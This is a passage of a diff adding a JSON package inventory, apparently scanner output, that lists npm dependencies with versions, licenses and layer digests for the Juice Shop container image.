"59c2210f88acb400" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/plugin-base32-scure/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@otplib/plugin-crypto-noble@13.4.0", + "Name": "@otplib/plugin-crypto-noble", + "Identifier": { + "PURL": "pkg:npm/%40otplib/plugin-crypto-noble@13.4.0", + "UID": "4568467b563765ad" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/plugin-crypto-noble/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@otplib/totp@13.4.0", + "Name": "@otplib/totp", + "Identifier": { + "PURL": "pkg:npm/%40otplib/totp@13.4.0", + "UID": "3af81123ffe6edbd" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/totp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@otplib/uri@13.4.0", + "Name": "@otplib/uri", + "Identifier": { + "PURL": "pkg:npm/%40otplib/uri@13.4.0", + "UID": "2a01eed0caa933b0" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/uri/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@pkgjs/parseargs@0.11.0", + "Name": "@pkgjs/parseargs", + "Identifier": { + "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", + "UID": "b6076ca3242492db" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@pkgjs/parseargs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@scarf/scarf@1.4.0", + "Name": "@scarf/scarf", + "Identifier": { + "PURL": "pkg:npm/%40scarf/scarf@1.4.0", + "UID": "75db5183f3b23151" + }, + "Version": "1.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@scarf/scarf/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@scure/base@2.2.0", + "Name": "@scure/base", + "Identifier": { + "PURL": "pkg:npm/%40scure/base@2.2.0", + "UID": "1637df233b2f734c" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@scure/base/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@sindresorhus/is@0.7.0", + "Name": "@sindresorhus/is", + "Identifier": { + "PURL": "pkg:npm/%40sindresorhus/is@0.7.0", + "UID": "28c7b4ac82e1b09d" + }, + "Version": "0.7.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@sindresorhus/is/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@so-ric/colorspace@1.1.6", + "Name": "@so-ric/colorspace", + "Identifier": { + "PURL": "pkg:npm/%40so-ric/colorspace@1.1.6", + "UID": "6aa754981c778fac" + }, + "Version": "1.1.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@so-ric/colorspace/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@standard-schema/spec@1.1.0", + "Name": "@standard-schema/spec", + "Identifier": { + "PURL": "pkg:npm/%40standard-schema/spec@1.1.0", + "UID": "53c8a0d2117baba8" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@standard-schema/spec/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@swc/helpers@0.3.17", + "Name": "@swc/helpers", + "Identifier": { + "PURL": "pkg:npm/%40swc/helpers@0.3.17", + "UID": "478872f3eb1b8d60" + }, + "Version": "0.3.17", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@swc/helpers/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@tokenizer/token@0.3.0", + "Name": "@tokenizer/token", + "Identifier": { + "PURL": "pkg:npm/%40tokenizer/token@0.3.0", + "UID": "4a87bd8e52ac211f" + }, + "Version": "0.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@tokenizer/token/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@tootallnate/once@1.1.2", + "Name": "@tootallnate/once", + "Identifier": { + "PURL": "pkg:npm/%40tootallnate/once@1.1.2", + "UID": "bb8d8d749eb76d82" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@tootallnate/once/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/component-emitter@1.2.14", + "Name": "@types/component-emitter", + "Identifier": { + "PURL": "pkg:npm/%40types/component-emitter@1.2.14", + "UID": "38cdf360eae5de05" + }, + "Version": "1.2.14", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/component-emitter/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/cookie@0.4.1", + "Name": "@types/cookie", + "Identifier": { + "PURL": "pkg:npm/%40types/cookie@0.4.1", + "UID": "e86223a5fda06ffb" + }, + "Version": "0.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/cookie/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/cors@2.8.19", + "Name": "@types/cors", + "Identifier": { + "PURL": "pkg:npm/%40types/cors@2.8.19", + "UID": "832976eb08aeeb27" + }, + "Version": "2.8.19", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/cors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/debug@4.1.13", + "Name": "@types/debug", + "Identifier": { + "PURL": "pkg:npm/%40types/debug@4.1.13", + "UID": "245e4f49723b7cb7" + }, + "Version": "4.1.13", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/ms@2.1.0", + "Name": "@types/ms", + "Identifier": { + "PURL": "pkg:npm/%40types/ms@2.1.0", + "UID": "c2d388398c4213a" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/ms/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/node@20.19.41", + "Name": "@types/node", + "Identifier": { + "PURL": "pkg:npm/%40types/node@20.19.41", + "UID": "b1e253fc16c2d6e2" + }, + "Version": "20.19.41", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/node/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/node@22.7.5", + "Name": "@types/node", + "Identifier": { + "PURL": "pkg:npm/%40types/node@22.7.5", + "UID": "af8633a0142965b5" + }, + "Version": "22.7.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ethers/node_modules/@types/node/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/triple-beam@1.3.5", + "Name": "@types/triple-beam", + "Identifier": { + "PURL": "pkg:npm/%40types/triple-beam@1.3.5", + "UID": "27236777ff30d7e9" + }, + "Version": "1.3.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/triple-beam/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@types/validator@13.15.10", + "Name": "@types/validator", + "Identifier": { + "PURL": "pkg:npm/%40types/validator@13.15.10", + "UID": "bd569ee563c149e7" + }, + "Version": "13.15.10", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@types/validator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@vercel/oidc@3.2.0", + "Name": "@vercel/oidc", + "Identifier": { + "PURL": "pkg:npm/%40vercel/oidc@3.2.0", + "UID": "636be55f7fe7ba8c" + }, + "Version": "3.2.0", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@vercel/oidc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "abbrev@1.1.1", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@1.1.1", + "UID": "79c8fe3455acad87" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/abbrev/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "abbrev@3.0.1", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@3.0.1", + "UID": "cb40291b3cc92c7c" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-gyp/node_modules/abbrev/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "abort-controller@3.0.0", + "Name": "abort-controller", + "Identifier": { + "PURL": "pkg:npm/abort-controller@3.0.0", + "UID": "bc6c0f76e5d6d0b9" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/abort-controller/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "accepts@1.3.8", + "Name": "accepts", + "Identifier": { + "PURL": "pkg:npm/accepts@1.3.8", + "UID": "855afda79ac94d91" + }, + "Version": "1.3.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/accepts/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "acorn@7.4.1", + "Name": "acorn", + "Identifier": { + "PURL": "pkg:npm/acorn@7.4.1", + "UID": "ad6fc547b22d64f6" + }, + "Version": "7.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/is-expression/node_modules/acorn/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "aes-js@4.0.0-beta.5", + "Name": "aes-js", + "Identifier": { + "PURL": "pkg:npm/aes-js@4.0.0-beta.5", + "UID": "37d93b165b6b6ca9" + }, + "Version": "4.0.0-beta.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/aes-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "agent-base@6.0.2", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@6.0.2", + "UID": "fb1d93e07791cd4c" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/agent-base/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "agent-base@7.1.4", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@7.1.4", + "UID": "1692ca33f43c3ce7" + }, + "Version": "7.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/agent-base/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "agentkeepalive@4.6.0", + "Name": "agentkeepalive", + "Identifier": { + "PURL": "pkg:npm/agentkeepalive@4.6.0", + "UID": "af2a43f427fb937b" + }, + "Version": "4.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/agentkeepalive/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "aggregate-error@3.1.0", + "Name": "aggregate-error", + "Identifier": { + "PURL": "pkg:npm/aggregate-error@3.1.0", + "UID": "867baa25e733b9a4" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/aggregate-error/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ai@6.0.180", + "Name": "ai", + "Identifier": { + "PURL": "pkg:npm/ai@6.0.180", + "UID": "82f605729be97a67" + }, + "Version": "6.0.180", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ai/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@2.1.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@2.1.1", + "UID": "d2061d1a501161d6" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/gauge/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@2.1.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@2.1.1", + "UID": "3dac743ec9654925" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@2.1.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@2.1.1", + "UID": "c6384b44de09390d" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/has-ansi/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@3.0.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@3.0.1", + "UID": "b84f0b6d5f8a2e11" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wide-align/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@5.0.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@5.0.1", + "UID": "50a909f3d515b605" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@6.2.2", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@6.2.2", + "UID": "8a6e2a2b83f17fa0" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@isaacs/cliui/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-regex@6.2.2", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@6.2.2", + "UID": "e39fb52fb40612ca" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi/node_modules/ansi-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-styles@2.2.1", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@2.2.1", + "UID": "6166b758570a454c" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/node_modules/ansi-styles/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-styles@3.2.1", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@3.2.1", + "UID": "f0f85f2b30d8163f" + }, + "Version": "3.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ansi-styles/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-styles@4.3.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@4.3.0", + "UID": "b8c643e96eeac635" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/node_modules/ansi-styles/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-styles@4.3.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@4.3.0", + "UID": "7976ce52bf59bc2" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/replace/node_modules/ansi-styles/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-styles@4.3.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@4.3.0", + "UID": "189a012ba52cc6d5" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi-cjs/node_modules/ansi-styles/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ansi-styles@6.2.3", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@6.2.3", + "UID": "13f89aced9fafa03" + }, + "Version": "6.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi/node_modules/ansi-styles/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "append-field@1.0.0", + "Name": "append-field", + "Identifier": { + "PURL": "pkg:npm/append-field@1.0.0", + "UID": "59320c14bd4e51ef" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/append-field/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "aproba@1.2.0", + "Name": "aproba", + "Identifier": { + "PURL": "pkg:npm/aproba@1.2.0", + "UID": "82da9c682d4f477d" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/aproba/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "archive-type@4.0.0", + "Name": "archive-type", + "Identifier": { + "PURL": "pkg:npm/archive-type@4.0.0", + "UID": "97a5d8ccaf525c27" + 